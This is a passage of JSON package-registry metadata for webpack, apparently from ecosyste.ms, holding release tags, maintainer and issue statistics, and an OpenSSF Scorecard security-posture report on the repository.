ack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T14:55:25.223Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-24.04","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.04","url":"https://launchpad.net/ubuntu/noble","ecosystem":"ubuntu","default":true,"packages_count":37306,"maintainers_count":0,"namespaces_count":4,"keywords_count":1697,"github":"ubuntu","metadata":{"codename":"noble","funded_packages_count":1372},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:45.928Z","updated_at":"2026-09-02T05:06:09.133Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/namespaces"}},{"id":893103,"name":"@ddder/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"ddder","versions_count":1,"first_release_published_at":"2017-11-03T02:17:58.652Z","latest_release_published_at":"2017-11-03T02:17:58.652Z","latest_release_number":"3.8.1-ddder.1","last_synced_at":"2026-09-03T00:23:24.883Z","created_at":"2022-04-07T16:17:18.800Z","updated_at":"2026-09-03T00:23:24.883Z","registry_url":"https://www.npmjs.com/package/@ddder/webpack","install_command":"npm install @ddder/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.1-ddder.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 